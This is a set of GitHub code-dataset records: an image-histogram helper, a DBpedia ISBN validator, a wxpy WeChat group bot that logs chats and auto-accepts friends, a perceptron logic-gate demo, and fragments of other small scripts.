(s/n) \").lower().strip()\n if opcao == \"s\":\n continuar = opcao\n else:\n continuar = 'n'\n\nprint(f'A campanha foi finalizada.\\nTotal de animais vacinados: {pets_vacinados}')","repo_name":"Slimacar/Academicos","sub_path":"3_CODIGO_EuTuNos.py","file_name":"3_CODIGO_EuTuNos.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"6607631946","text":"from matplotlib import pyplot as plt\r\nfrom collections.abc import Iterable\r\nfrom os import path\r\nfrom datetime import datetime\r\nfrom IPython.display import Image\r\n\r\nimport cv2 as cv\r\nimport numpy as np\r\nimport re\r\n\r\n\r\ndef show_image(image):\r\n \"\"\"\r\n Stores first a version in the hard drive with a name generated from the current\r\n timestamp, then display it using jupyter builtin function Image\r\n \"\"\"\r\n current_timestamp = datetime.now()\r\n extension = '.jpg' # auto handled by opencv.\r\n filename = re.sub(r'\\D', '_', str(current_timestamp)) + extension\r\n temporary_directory = 'temporary_pics'\r\n file_path = path.join('.', temporary_directory, filename)\r\n cv.imwrite(file_path, image)\r\n return Image(file_path)\r\n\r\n\r\ndef load_image(filename):\r\n pics_directory = 'pics'\r\n # for portable code between different platforms.\r\n file_path = path.join(pics_directory, filename)\r\n return cv.imread(file_path, 0)\r\n\r\n\r\ndef show_image_with_histogram(images, show_cdf=False):\r\n \"\"\"\"\r\n Display images by side their histogram\r\n\r\n Parameters\r\n ----------\r\n image : array of images or a single image\r\n embed_cdf: whether to include cumulative distributive \r\n function in the histogram plot default false\r\n \"\"\"\r\n\r\n if not isinstance(images, Iterable):\r\n images = [images, ]\r\n\r\n image_count, subplot_index = len(images), 1\r\n\r\n plt.figure(\r\n num=None, \r\n figsize=(16, 3*image_count), \r\n dpi=100, \r\n facecolor='w', \r\n edgecolor='k'\r\n )\r\n\r\n for image in images:\r\n histogram, _ = np.histogram(image.flatten(),256,[0,256])\r\n # histogram = cv.calcHist([image],[0],None,[256],[0,256])\r\n plt.subplot(image_count, 2, subplot_index)\r\n plt.imshow(image, 'gray')\r\n\r\n plt.subplot(image_count, 2, subplot_index + 1)\r\n plt.hist(image.flatten(),256,[0,256], color = 'r')\r\n\r\n if show_cdf:\r\n cdf = histogram.cumsum()\r\n cdf_normalized = cdf * histogram.max()/ cdf.max()\r\n plt.plot(cdf_normalized, color = 'b')\r\n plt.legend(('cdf','histogram'), loc = 'upper left')\r\n\r\n subplot_index += 2\r\n\r\n plt.xlim([0,256])\r\n plt.show()\r\n","repo_name":"rachid-el-kedmiri/digital_image_processing","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20735202438","text":"__author__ = 'torresal'\n\n\"\"\"Notes for Programmer\"\"\"\n\"\"\"Helpful links:\n http://dbpedia.org/sparql\n http://dbpedia.org/sparql?default-graph-uri=http%3A%2F%2Fdbpedia.org&query=select+distinct+%3Fbook+%3Fisbn%0D%0A++++where+%7B%0D%0A++++++%3Fbook+a+dbo%3ABook+.%0D%0A++++++%3Fbook+%3Fprop+%3Fobj+.%0D%0A++++++%3Fbook+dbp%3Aisbn+%3Fisbn+.%0D%0A++++%7D%0D%0A++++LIMIT+1000&format=text%2Fhtml&timeout=30000&debug=on\n https://pypi.python.org/pypi/Distance\"\"\"\n\nimport re,argparse, time\nfrom isbn_hyphenate import hyphenate\nfrom isbnlib import EAN13, clean, to_isbn13, meta, canonical, to_isbn10\nfrom SPARQLWrapper import SPARQLWrapper, JSON\n\ndef 
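`show_image_with_histogram` above overlays a scaled cumulative distribution on the intensity histogram. The core of that computation, reduced to a synthetic image:

```python
import numpy as np

image = np.random.randint(0, 256, (64, 64), dtype=np.uint8)
hist, _ = np.histogram(image.flatten(), 256, [0, 256])
cdf = hist.cumsum()
cdf_normalized = cdf * hist.max() / cdf.max()  # rescaled to the hist's range
```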
RQUERY(r):\n #SPARQL query ISBNs from dbpedia\n sparql = SPARQLWrapper(\"http://dbpedia.org/sparql\")\n sparql.setQuery(r)\n sparql.setReturnFormat(JSON)\n results = sparql.query().convert()\n print(r)\n #print(results)\n if len(results[\"results\"][\"bindings\"]) != 0:\n print(results)\n pass\n return results[\"results\"][\"bindings\"]\n\nQUERY = \"\"\"\n select distinct ?book ?prop ?obj\n where {\n ?book a dbo:Book .\n ?book ?prop ?obj .\n ?book dbp:isbn ?isbn .\n FILTER (regex(?isbn, \"%s\" ))\n }\n LIMIT 100\n \"\"\"\n\n#ERROR file\nfile = open(\"DBPEDIA-ERRORS.txt\", \"w\")\nDATE = (\"DATE:\" + time.strftime(\"%m/%d/%Y\"))\nTIME = (\"MILITARY TIME:\" + time.strftime(\"%H:%M:%S\"))\nfile.write(DATE+\"\\n\"+TIME+\"\\n\")\n\n\ndef parse(url):\n import requests\n r = requests.get(url, verify = False)\n JSONdict = r.json()\n return JSONdict\n\ndef main():\n#Commnd line arguments\n parser = argparse.ArgumentParser()\n parser.add_argument('-path', '--GCIS', help = \"Insert url path to GCIS book in JSON format [ex.'https://gcis-search-stage.jpl.net:3000/book.json?all=1'] \")\n args = parser.parse_args()\n GCIS = args.GCIS\n\n if GCIS is None:\n GCIS = 'https://gcis-search-stage.jpl.net:3000/book.json?all=1'\n print('NO MANUAL GCIS PATH\\n ALL GCIS BOOK JSON FORMATS WILL BE USED AS DEFAULT')\n\n GCISPAR = parse(GCIS)\n for x in range(len(GCISPAR)):\n try:\n #Extracts book identifier from GCIS#\n IDEN = GCISPAR[x][\"identifier\"]\n match = re.search(r'.*/(.*?)\\..*?$', GCIS)\n if match:\n FILETYPE = match.groups()[0]\n #HREF = url that leads to book.json in GCIS-DEV\n HREF = 'https://gcis-search-stage.jpl.net:3000/{}/{}.json' .format(FILETYPE,IDEN)\n HREFPAR = parse(HREF)\n #Extracts book title and isbn from GCIS-DEV\n d = dict(HREFPAR)\n TITLE = d['title']\n ISBNS = d['isbn']\n #Cleans ISBNS to only conatian valid characters\n CISBN = clean(ISBNS)\n #V13 = validated canonical ISBN-13\n V13 = EAN13(CISBN)\n if V13 is None:\n V13 = canonical(CISBN)\n M = parse(HREF)\n\n print(\"GCIS-DEV\\n\\n\\t\", M, '\\n\\n\\t', \"isbn_original:\", ISBNS, '\\n\\n\\t', \"isbn_mod:\", V13, \"\\n\\n\")\n\n #DBpedia ISBN formats\n a = ISBNS\n b = canonical(CISBN)\n c = to_isbn10(CISBN)\n d = hyphenate(to_isbn10(CISBN))\n e = to_isbn13(CISBN)\n f = hyphenate(to_isbn13(CISBN))\n g = V13\n h = \"ISBN {}\" .format(CISBN)\n i = \"ISBN {}\" .format(canonical(CISBN))\n j = \"ISBN {}\" .format(hyphenate(to_isbn13(CISBN)))\n k = \"ISBN {}\" .format(V13)\n l = \"ISBN {}\" .format(to_isbn10(CISBN))\n m = \"ISBN {}\" .format(hyphenate(to_isbn10(CISBN)))\n\n tests = [a,b,c,d,e,f,g,h,i,j,k,l,m]\n\n for indie in tests:\n r = QUERY % indie\n RQUERY(r)\n if len(RQUERY(r)) != 0:\n print(RQUERY(r))\n break\n\n\n except:\n Error = '\\n\\t######## PROBLEM #######\\n\\tTitle:{}\\n\\tGCIS-ISBN:{}\\n\\tIdentifier:{}\\n\\n'.format(TITLE, ISBNS, IDEN)\n print(Error)\n file.write(Error)\n\nif __name__ =='__main__':\n main()\n\n\n\n","repo_name":"torresal/gcis-isbn-validation","sub_path":"dbpedia_isbn_validator.py","file_name":"dbpedia_isbn_validator.py","file_ext":"py","file_size_in_byte":4109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"23083645220","text":"#!/usr/bin/env python\n#coding: utf-8\n\n#from __future__ import division\nimport os\nimport time\nimport datetime\nimport threading\nimport schedule\nimport configparser\nimport re\nimport sys\nimport hashlib\nimport random\nfrom wxpy import *\n#from xpinyin import Pinyin\n\n\nfrom init import analyze\n#from init import 
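The validator builds many textual variants of each ISBN before querying DBpedia. A small sketch of the `isbnlib` normalisation it relies on (the example ISBN is arbitrary):

```python
from isbnlib import canonical, clean, to_isbn10, to_isbn13

raw = '978-0-306-40615-7'
c = clean(raw)                   # strip separators -> '9780306406157'
print(canonical(c))              # '9780306406157'
print(to_isbn10(c))              # '0306406152'
print(to_isbn13('0306406152'))   # back to the 13-digit form
```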
express\nfrom init.logger import logger\nfrom init import xiaoyu\nfrom init import xiaodou\nfrom init import jianbao\nfrom init import diyi\nfrom importlib import reload\nreload(sys)\n#sys.setdefaultencoding('utf8')\n\n\n\nclass GroupMessage():\n #从配置文件获取参数,初始化变量\n def __init__(self):\n self.log_flag = 0\n cf = configparser.ConfigParser()\n if os.path.exists('config/my.conf'):\n cf.read('config/my.conf')\n else:\n cf.read('config/wechat.conf')\n self.path = cf.get('wechat', 'path')\n group_names = cf.get('wechat', 'group_name')\n self.group_list=group_names.strip(',').split(',')\n self.friend_name = cf.get('wechat','friends')\n self.torla_name = cf.get('wechat','group')\n self.welcome_word = cf.get('wechat','welcome_word')\n self.newcomer = cf.get('wechat','newcomer')\n self.recev_mps = int(cf.get('wechat','recev_mps'))\n self.use_xiaoi = int(cf.get('wechat','xiaoi'))\n self.key = cf.get('wechat','key')\n self.secret = cf.get('wechat','secret')\n self.xiaodou_key = cf.get('wechat','xiaodou_key')\n self.friends_accept = cf.get('wechat','friends_accept')\n \n self.invite_group1 = cf.get('wechat','invite_group1')\n self.invite_group2 = cf.get('wechat','invite_group2')\n \n self.send_morning = u'@all 早上好'\n self.send_night = u'@all 晚安哦'\n group_note = cf.get('wechat', 'group_note')\n self.group_note_list=group_note.strip(',').split(',')\n group_jianbao = cf.get('wechat', 'group_jianbao')\n self.group_jianbao_list=group_jianbao.strip(',').split(',')\n group_newcomer = cf.get('wechat', 'group_newcomer')\n group_newcomer1 = cf.get('wechat', 'group_newcomer1')\n self.group_newcomer_list=group_newcomer.strip(',').split(',')\n self.group_newcomer_list1=group_newcomer1.strip(',').split(',')\n self.send_time = cf.get('wechat', 'send_time')\n self.send_talks = cf.get('wechat', 'send_talks')\n \n if not os.path.exists(self.path):\n os.mkdir(self.path)\n self.talk_path = os.path.join(self.path, 'talks')\n if not os.path.exists(self.talk_path):\n os.mkdir(self.talk_path)\n self.members_path = os.path.join(self.path, 'members')\n if not os.path.exists(self.members_path):\n os.mkdir(self.members_path)\n self.friends_path = os.path.join(self.path, 'friends')\n if not os.path.exists(self.friends_path):\n os.mkdir(self.friends_path)\n self.friends_pic_path = os.path.join(self.path, 'friends', 'pic')\n if not os.path.exists(self.friends_pic_path):\n os.mkdir(self.friends_pic_path)\n\n self.xiaoi = XiaoI(self.key, self.secret)\n self.xiaoyuer = xiaoyu.XiaoY()\n self.xiaodou = xiaodou.Xiaodou(self.xiaodou_key)\n\n self.send_me = 1\n\n def init_group_name(self):\n self.group__newcomer = []\n\n\n def login(self):\n self.bot = Bot(cache_path=True, console_qr=False)\n #self.bot.enable_puid()\n self.myself = self.bot.self\n try:\n self.friend = self.bot.friends().search(self.friend_name)[0]\n except:\n self.friend = self.bot.self\n \n #print self.bot.friends()\n #logger.info(self.bot.groups())\n #print self.bot.mps()\n\n def create_group_logfile(self):\n group = self.bot.groups(update=True)\n logger.info(group)\n for gs in group:\n group_name = hashlib.md5(gs.name.encode('utf-8')).hexdigest()[-8:]\n logger.info(gs)\n logger.info(group_name)\n log_file = os.path.join(self.path,group_name)\n if not os.path.exists(log_file):\n os.mkdir(log_file)\n \n\n def send_friend_msg(self,send_msg):\n logger.info(\"send message to beijing group\")\n self.torla = self.bot.groups().search(u'北京交友群')[0]\n self.torla.send(send_msg)\n def send_kevin_msg(self):\n now_time = time.asctime( time.localtime(time.time()) )\n self.kevin_m = 
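`create_group_logfile` keys each group's log directory on the last eight hex characters of the MD5 of the group name, which keeps non-ASCII names out of filesystem paths:

```python
import hashlib

name = u'北京交友群'
suffix = hashlib.md5(name.encode('utf-8')).hexdigest()[-8:]
print(suffix)   # an 8-character hex directory name for this group
```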
self.bot.friends().search('Kevin')[0]\n self.kevin_m.send(now_time)\n\n def send_group_msg(self):\n now_time = datetime.datetime.now().strftime(\"%H:%M\")\n if now_time > '09:00' and now_time < '23:00':\n topic_f = open(\"material/topic.txt\",\"r\")\n comment = topic_f.readlines()\n comment_filter = []\n for co in comment:\n if not co.startswith('#'):\n comment_filter.append(co)\n #print len(comment_filter)\n one_topic = comment_filter[random.randint(0,len(comment_filter)-1)]\n \n self.group_jiaoyou = self.bot.groups().search(u'北京交友群')[0]\n #self.group_jiaoyou1 = self.bot.groups().search(u'测试专用群')[0]\n self.group_jiaoyou.send(one_topic)\n\n timer = threading.Timer(7200, self.send_group_msg)\n timer.start()\n\n def msg_from_friends(self):\n @self.bot.register(Friend)\n def msg_yy(msg):\n\n #create log file\n day = time.strftime(\"%Y-%m-%d\")\n file_name = '%s.txt' % ( day)\n file_ab_path = os.path.join(self.friends_path, file_name)\n create_time = msg.create_time.strftime('%Y-%m-%d %H:%M:%S')\n #pic_file = os.path.join(self.path,group_name,day)\n #if not os.path.exists(pic_file):\n #os.mkdir(pic_file)\n \n #ret_text, self.use_xiaoi = self.xiaoyuer.do_reply(msg,self.use_xiaoi)\n \n #微信web版无法邀请好友入群\n\n if msg.type == PICTURE:\n word_text = \"PICTURE:%s\" % ( msg.file_name) \n ct = msg.create_time.strftime('%Y-%m-%d-%H-%M-%S')\n msg.get_file('%s/%s-%s-%s' % (self.friends_pic_path,ct,random.randint(1,10),msg.file_name))\n #if msg.file_name.endswith(\".png\"):\n # new_friend = self.bot.friends().search(msg.sender.name)[0]\n # group_add = self.bot.groups().search(self.invite_group2)[0]\n # group_add.add_members(new_friend, use_invitation=True)\n #group_beijing = self.bot.groups().search(self.invite_group3)[0]\n #group_beijing.add_members(new_friend, use_invitation=True)\n\n elif msg.type == TEXT:\n word_text = msg.text\n '''\n print self.friends_accept\n #if self.friends_accept and (u'我通过了你的朋友验证请求' in msg.text or u\"现在我们可以开始聊天了\" in msg.text):\n if self.friends_accept and u'我通过了你的朋友验证请求' in msg.text:\n msg.reply('嗨,您好!欢迎你加入芊芊结北京单身群,为了保证群内良好的交流与互动,请进群后务必根据群要求修改群名片,并完成相应步骤,你才能更好脱单哦!!')\n new_friend = self.bot.friends().search(msg.sender.name)[0]\n group_add = self.bot.groups().search(self.invite_group1)[0]\n group_add.add_members(new_friend, use_invitation=True)\n msg.reply_raw_msg(\n raw_type=42,\n raw_content='') \n msg.reply(u'另外如若想进入其他北京地区单身群,需要做点小任务哦!将以下图片转发到朋友圈,并配上以下文字。完成后将截图发送给我即可。文字内容如下:')\n msg.reply(u\"”这个平台不错哦,群主也很靠谱,大家可以扫描加入,体验一下“\")\n msg.reply_image(\"material/welcome.jpg\")\n elif msg.text == u'入群' or msg.text == \"加群\":\n msg.reply('回复相应数字即可发送群邀请\\n1. 北京芊芊结1群\\n\\\n2. 北京芊芊 结C群\\n3. 缘来是你北京交友群\\n4. 
机器人小鱼儿聊天群') \n elif msg.text == u'3':\n msg.reply('缘来是你北京交友群') \n new_friend = self.bot.friends().search(msg.sender.name)[0]\n group_beijing = self.bot.groups().search(u'北京交友群')[0]\n group_beijing.add_members(new_friend, use_invitation=True)\n elif msg.text == u'1':\n msg.reply('北京芊芊结1群') \n new_friend = self.bot.friends().search(msg.sender.name)[0]\n group_add = self.bot.groups().search(u'北京芊芊结1群')[0]\n group_add.add_members(new_friend, use_invitation=True)\n elif msg.text == u'4':\n msg.reply('机器人小鱼儿聊天群') \n new_friend = self.bot.friends().search(msg.sender.name)[0]\n group_add = self.bot.groups().search(u'机器人小鱼儿聊天群')[0]\n group_add.add_members(new_friend, use_invitation=True)\n elif msg.text == u'2':\n msg.reply('北京芊芊结C群') \n new_friend = self.bot.friends().search(msg.sender.name)[0]\n group_add = self.bot.groups().search(u'北京芊芊结C群')[0]\n group_add.add_members(new_friend, use_invitation=True)\n elif msg.text == u'5':\n msg.reply('北京芊芊结单身5群') \n new_friend = self.bot.friends().search(msg.sender.name)[0]\n group_add = self.bot.groups().search(u'北京芊芊结单身5群')[0]\n group_add.add_members(new_friend, use_invitation=True)\n \n '''\n #if msg.sender.name == 'Kevin':\n # try:\n # send_kevin =12\n # if send_kevin == 1:\n # msg.reply('Hello')\n #except Exception as e:\n # logger.error(e)\n #msg.reply(u'这话我没法接')\n\n if msg.text == u'你好':\n try:\n msg.reply(u'你好') \n except Exception as e:\n logger.error(e)\n word = \"%s %s:%s\\n\" % (create_time, msg.sender.name, word_text)\n with open(file_ab_path, \"a+\") as f:\n f.write(word.encode('utf-8'))\n word = None\n\n #处理公共号消息\n def my_mps(self):\n @self.bot.register(MP)\n def print_mp_msg(msg):\n #self.friend.send(msg)\n #self.friend.send_raw_msg( raw_content=msg.raw)\n #msg.forward(self.friend)\n \"\"\"\n if msg.type == SHARING and msg.sender.name == '爱净意':\n for article in msg.articles:\n if '第壹简报' in article.title:\n self.friend.send(article.title)\n self.friend.send(article.url)\n #article_url = 'https://mp.weixin.qq.com/s/5E_SGRmaDA9O1nZgjGG0mw'\n jb = jianbao.Get_Jianbao(article.url)\n jb_content = jb.out_jianbao()\n logger.info(jb_content)\n self.friend.send(jb_content)\n if msg.type == SHARING and msg.sender.name == '硕士博士俱乐部':\n for article in msg.articles:\n if '妹子篇' in article.title:\n self.friend.send(article.title)\n self.friend.send(article.url)\n if msg.type == SHARING and msg.sender.name == '硕博联谊':\n for article in msg.articles:\n if '妹子' in article.title and '现居北京' in article.title:\n self.friend.send(article.title)\n self.friend.send(article.url)\n \"\"\"\n if msg.type == SHARING and msg.sender.name == '简报微刊':\n for article in msg.articles:\n if '简报微刊' in article.title:\n #self.friend.send(article.title)\n #self.friend.send(article.url)\n jb = jianbao.Get_Jianbao(article.url)\n jb_content = jb.out_jianbao()\n self.jb_content = jb_content\n logger.info(jb_content)\n #self.friend.send(jb_content)\n\n for group_n in self.group_jianbao_list:\n try:\n my_group = self.bot.groups().search(group_n)[0]\n my_group.send(jb_content)\n except(IndexError,e):\n logger.error('%s not exists, please check it!' 
%val)\n if msg.type == SHARING and msg.sender.name == '第壹简报':\n for article in msg.articles:\n if '第壹简报' in article.title:\n #self.friend.send(article.title)\n #self.friend.send(article.url)\n _jb = diyi.Get_Jianbao(article.url)\n diyi_content = _jb.out_jianbao()\n self.diyi_content = diyi_content\n logger.info(diyi_content)\n #self.friend.send(jb_content)\n\n for group_n in self.group_jianbao_list:\n try:\n my_group = self.bot.groups().search(group_n)[0]\n my_group.send(diyi_content)\n except(IndexError,e):\n logger.error('%s not exists, please check it!' %val)\n\n\n def msg_from_friends_accept(self):\n @self.bot.register(msg_types=FRIENDS)\n def auto_accept_friends(msg):\n logger.info(\"enter accept\")\n #new_friend = self.bot.accept_friend(msg.card)\n new_friend = msg.card.accept()\n new_friend.send('嗨,您好!欢迎你加入芊芊结北京单身群,为了保证群内良好的交流与互动,请进群后务必根据群要求修改群名片,并完成相应步骤,你才能更好脱单哦!!')\n #msg.reply('欢迎加入北京芊芊结1群,加入更多群请回复:加群')\n #new_friend = self.bot.friends().search(msg.sender.name)[0]\n group_add = self.bot.groups().search(self.invite_group1)[0]\n group_add.add_members(new_friend, use_invitation=True)\n msg.reply_raw_msg(\n raw_type=42,\n raw_content='') \n new_friend.send('另外如若想进入其他北京地区单身群,需要做点小任务哦!将以下图片转发到朋友圈,并配上以下\\\n文字,完成后将截图发送给我即可。文字内容如下:')\n new_friend.send(u\"”这个平台不错哦,群主也很靠谱,大家可以扫描加入,体验一下“\")\n new_friend.send_image(\"material/welcome.jpg\")\n #logger.info(\"after accept\")\n \n #处理群消息\n def group_msg(self):\n #注册消息\n @self.bot.register(Group)\n def print_msg(msg):\n #日志文件创建\n group_name = hashlib.md5(msg.sender.name.encode('utf-8')).hexdigest()[-8:]\n my_group = self.bot.groups().search(msg.sender.name)[0]\n log_file = os.path.join(self.path,group_name)\n #print group_name\n day = time.strftime(\"%Y-%m-%d\")\n file_name = '%s.txt' % ( day)\n file_ab_path = os.path.join(log_file, file_name)\n #pic_file = 'log/%s-%s' % (group_zh_name,day)\n pic_file = os.path.join(self.path,group_name,day)\n if not os.path.exists(pic_file):\n os.mkdir(pic_file)\n \n create_time = msg.create_time.strftime('%Y-%m-%d %H:%M:%S')\n #name = msg.member.name\n name = msg.member.nick_name\n #群内有被at的消息就会智能回复,支持图灵和小i机器人,默认小i\n #print msg.is_at\n #print self.use_xiaoi\n #if msg.is_at and self.use_xiaoi == 1:\n myword = ''\n #消息处理,TEXT文本,SHARING链接,PICTURE图片,RECORDING语音,\n #ATTACHMENT附件,NOTE红包提示,新人入群提示,MAP地图\n #print PICTURE, VIDEO,RECORDING,ATTACHMENT\n if msg.type == TEXT:\n word = \"%s %s:%s\\n\" % (create_time, name, msg.text)\n if msg.is_at or msg.text.startswith(u'小鱼儿'):\n #tuling = Tuling(api_key=self.key)\n ret_text, self.use_xiaoi = self.xiaoyuer.do_reply(msg,self.use_xiaoi,my_group)\n \n #小豆机器人\n if ret_text == '1' and self.use_xiaoi == 1:\n ret_text = self.xiaodou.do_reply(msg)\n if ret_text == '2' and self.use_xiaoi == 1:\n ret_text = self.xiaoi.do_reply(msg)\n #ret_text = tuling.do_reply(msg)\n myword = \"%s %s:%s\\n\" % (create_time, self.myself.name, ret_text)\n \n elif msg.type == SHARING:\n #print msg\n word = \"%s %s:SHARING:%s\\n\" % (create_time, name, msg.text)\n \n elif msg.type in [PICTURE, VIDEO,RECORDING,ATTACHMENT]:\n ct = msg.create_time.strftime('%Y-%m-%d-%H-%M-%S')\n if msg.type == PICTURE:\n msg.get_file('%s/%s-%s-%s' % (pic_file,ct,random.randint(1,10),msg.file_name))\n word = \"%s %s:PICTURE:%s\\n\" % (create_time, name, msg.file_name)\n #elif msg.type == VIDEO:\n # msg.get_file('%s/%s-%s-%s' % (file_name,ct,name,msg.file_name))\n elif msg.type == RECORDING:\n #print name\n msg.get_file('%s/%s-%s-%s' % (pic_file,ct,name,msg.file_name))\n word = \"%s %s:RECORDING:%s\\n\" % (create_time, name, 
msg.file_name)\n elif msg.type == ATTACHMENT:\n #print msg.file_name\n msg.get_file('%s/%s-%s-%s' % (pic_file,ct,name,msg.file_name))\n word = \"%s %s:ATTACHMENT:%s\\n\" % (create_time, name, msg.file_name)\n elif msg.type == NOTE:\n #self.friend.send(word)\n if u'\\u6536\\u5230' in msg.text:\n #print 'red packages!!!!!!!!!!!!!!!!!!!!!!'\n self.friend.send('Red Package:%s' %(msg.sender.name))\n elif u'\\u9080\\u8bf7' in msg.text and self.newcomer == '1':\n if group_name in self.group_newcomer_list: \n new_name = msg.text.split('\"')[-2]\n new_name_1 = None\n elif group_name in self.group_newcomer_list1: \n #self.friend.send(self.group_newcomer_list1)\n new_name_1 = msg.text.split('\"')[-2]\n new_name = None\n elif u'\\u626b\\u63cf' in msg.text and self.newcomer == '1':\n if group_name in self.group_newcomer_list: \n new_name = msg.text.split('\"')[1]\n new_name_1 = None\n elif group_name in self.group_newcomer_list1: \n new_name = None\n new_name_1 = msg.text.split('\"')[1]\n else:\n new_name = new_name_1 = None\n \n if new_name:\n #newcomer_msg = \"\"\"@%s 欢迎新人进群交友聊天,请详细阅读群公告。\\n进群请修改备注:昵称-出生年-性别-职业(学生)-学历,如:\\n%s-90-男-IT-硕士\"\"\"% (new_name, new_name)\n newcomer_msg = \"@%s 欢迎新人入群!!\"% (new_name) + \"\\n\" + self.welcome_word\n msg.reply(newcomer_msg)\n elif new_name_1:\n newcomer_msg_1 = \"\"\"@%s 欢迎进群,快来跟我聊天吧!!!\"\"\"% (new_name_1)\n msg.reply(newcomer_msg_1)\n word = \"%s %s:NOTE:%s\\n\" % (create_time, name, msg.text)\n elif msg.type == CARD:\n word = \"%s %s:CARD:%s\\n\" % (create_time, name, msg.text)\n elif msg.type == MAP:\n word = \"%s %s:MAP:%s\\n\" % (create_time, name, msg.text)\n elif msg.type == SYSTEM:\n word = \"%s %s:SYSTEM:%s\\n\" % (create_time, name, msg.text)\n \n if word:\n with open(file_ab_path, \"a+\") as f:\n f.write(word.encode('utf-8'))\n if myword:\n f.write(myword.encode('utf-8'))\n word = None\n #msg.forward(self.friend)\n #记录日志\n def log_message(self,group_name, word):\n log_file = os.path.join(self.path,group_name)\n if not os.path.exists(log_file):\n os.mkdir(log_file)\n \n\n #日志文件创建\n day = time.strftime(\"%Y-%m-%d\")\n file_name = '%s.txt' % ( day)\n file_ab_path = os.path.join(log_file, file_name)\n pic_file = os.path.join(self.path,group_name,day)\n if not os.path.exists(pic_file):\n os.mkdir(pic_file)\n \n with open(file_ab_path, \"a+\") as f:\n f.write(word.encode('utf-8'))\n word = None\n\n\n #每10分钟检测一次离群人员\n def send_message(self):\n #self.group_note_list = [u'测试专用群']\n #print self.group_note_list\n for group_n in self.group_note_list:\n try:\n my_group = self.bot.groups().search(group_n)[0]\n except(IndexError,e):\n logger.error('%s not exists, please check it!' 
%group_n)\n continue\n\n #group_name = hashlib.md5(my_group.name.encode('utf-8')).hexdigest()[-8:]\n group_members = analyze.GroupMembers(self.path, my_group, self.friend) \n group_members.analyze_mem()\n timer = threading.Timer(600, self.send_message)\n timer.start()\n\n #使用schedule模块执行定时任务\n def use_sche(self):\n #if self.send_me == 1:\n #self.send_message()\n #schedule.every().day.at(\"17:17\").do(self.send_message)\n #schedule.every(10).minutes.do(self.send_message)\n schedule.every().day.at(\"08:00\").do(self.send_friend_msg,self.send_morning)\n #schedule.every().day.at(\"22:30\").do(self.send_friend_msg,self.send_night)\n #schedule.every().day.at(\"10:20\").do(self.send_friend_msg,u\"@all 休息一下吧,该喝水了!\")\n #schedule.every().day.at(\"11:30\").do(self.send_friend_msg,u\"@all 该吃午饭了!\")\n #schedule.every().day.at(\"13:00\").do(self.send_friend_msg,u\"@all 午休时间到!\")\n #schedule.every().day.at(\"16:00\").do(self.send_friend_msg,u\"@all 休息一下吧,该喝水了!\")\n \n while True:\n #self.myself.send('log out')\n if not self.bot.alive:\n logger.error('not login')\n self.main()\n break\n schedule.run_pending()\n time.sleep(10)\n \n\n #进入群聊接受消息 \n def run_task(self): \n #if self.friends_accept:\n #self.msg_from_friends_accept()\n self.msg_from_friends()\n self.create_group_logfile()\n #my_groups = []\n self.group_msg()\n\n while True:\n if not self.bot.alive:\n logger.info('not login')\n self.main()\n break\n time.sleep(10)\n \n #embed()\n #self.bot.join()\n \n def main(self):\n self.login()\n #threads = []\n if self.recev_mps == 1:\n t1 = threading.Thread(target=self.my_mps,args=())\n t1.setDaemon(True)\n t1.start()\n\n #timer = threading.Timer(1, self.send_message)\n #timer.start()\n # send topic \n #timer1 = threading.Timer(3600, self.send_group_msg)\n #timer1.start()\n t2 = threading.Thread(target=self.use_sche,args=())\n t2.setDaemon(True)\n t2.start()\n t3 = threading.Thread(target=self.run_task,args=())\n #t3.setDaemon(True)\n t3.start()\n\nif __name__ == \"__main__\":\n group_m = GroupMessage()\n group_m.main() \n\n","repo_name":"aijingyi/wechat-group","sub_path":"init/group.py","file_name":"group.py","file_ext":"py","file_size_in_byte":24992,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"75"} +{"seq_id":"41085630944","text":"import seaborn\nfrom sklearn.linear_model import Perceptron\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom itertools import product\n\ndata = [\n [0, 0],\n [0, 1],\n [1, 0],\n [1, 1]\n]\n\nlabels_AND = [0, 0, 0, 1]\nlabels_XOR = [0, 1, 1, 0]\nlabels_OR = [0, 1, 1, 1]\n\ndef visualise_gate(labels, name = \"\"):\n\n x = [point[0] for point in data]\n y = [point[1] for point in data]\n\n classifier = Perceptron(\n max_iter = 40\n )\n\n classifier.fit(data, labels)\n print(f\"{name} gate: \", classifier.score(data, labels))\n result = classifier.decision_function([[0, 0], [1, 1], [0.5, 0.5]])\n print(result)\n\n # make a heat map that reveals the decision boundary:\n # a list of 100 evenly spaced decimals between 0 and 1:\n x_values = y_values = np.linspace(0, 1, 100)\n point_grid = list(product(x_values, y_values))\n distances = classifier.decision_function(point_grid )\n abs_distances = np.abs(distances)\n distances_matrix = abs_distances.reshape((100, 100))\n\n plt.scatter(x, y, c = labels)\n plt.title(f\"{name} gate\")\n plt.show()\n\n heatmap = plt.pcolormesh(\n x_values,\n y_values,\n distances_matrix,\n shading='auto'\n )\n plt.colorbar(heatmap)\n plt.show()\n\nvisualise_gate(labels_AND, \"AND\") 
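`use_sche` mixes `schedule` jobs with a relogin check. The bare scheduling loop it runs, reduced to a standalone sketch (the greeting stands in for the group send):

```python
import schedule
import time

def morning_greeting():
    print('good morning')    # stands in for group.send(...)

schedule.every().day.at('08:00').do(morning_greeting)

while True:
    schedule.run_pending()   # fire any jobs that are due
    time.sleep(10)
```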
\nvisualise_gate(labels_XOR, \"XOR\") \nvisualise_gate(labels_OR, \"OR\") \n","repo_name":"lendoo73/Challenge-Project-of-CodeCademy","sub_path":"python/Build_Deep_Learning_Models_with_TensorFlow/Perceptron_Logic_Gates/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"75"} +{"seq_id":"7321313074","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nfrom collections import defaultdict\nimport datetime\nimport logging\nimport unicodedata\n\n# pip install python-telegram-bot\n# https://github.com/python-telegram-bot/python-telegram-bot\n# https://github.com/python-telegram-bot/python-telegram-bot/blob/master/examples/README.md\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters\n\nfrom startrek_fsm import TrekGame\n\nCONTACTLIST_FN = 